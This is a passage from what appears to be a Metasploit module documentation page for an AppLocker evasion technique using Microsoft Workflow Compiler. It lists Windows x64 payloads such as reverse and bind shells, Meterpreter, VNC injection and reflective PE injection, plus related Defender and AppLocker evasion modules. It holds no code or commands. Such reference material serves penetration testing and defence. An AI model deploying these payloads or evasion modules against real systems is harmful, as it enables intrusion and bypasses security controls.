215 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
216 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
217 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
218 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
219 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
220 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
221 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
222 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
223 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
224 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
225 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
226 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
227 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
228 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
229 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
230 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
231 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
232 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
233 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
234 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
235 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
236 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
237 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
238 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
239 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
240 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
241 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
242 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
243 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
244 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
245 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
246 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
247 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
248 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
249 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
250 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
251 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
252 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
253 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
254 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
255 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
256 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
257 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Go back to menu.
Related Pull Requests
References
- CVE: Not available
- https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
See Also
Check also the following modules related to this module:
- evasion/windows/applocker_evasion_install_util
- evasion/windows/applocker_evasion_msbuild
- evasion/windows/applocker_evasion_presentationhost
- evasion/windows/applocker_evasion_regasm_regsvcs
- evasion/windows/process_herpaderping
- evasion/windows/syscall_inject
- evasion/windows/windows_defender_exe
- evasion/windows/windows_defender_js_hta
Authors
- Nick Tyrer <@NickTyrer>
- Matt Graeber
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.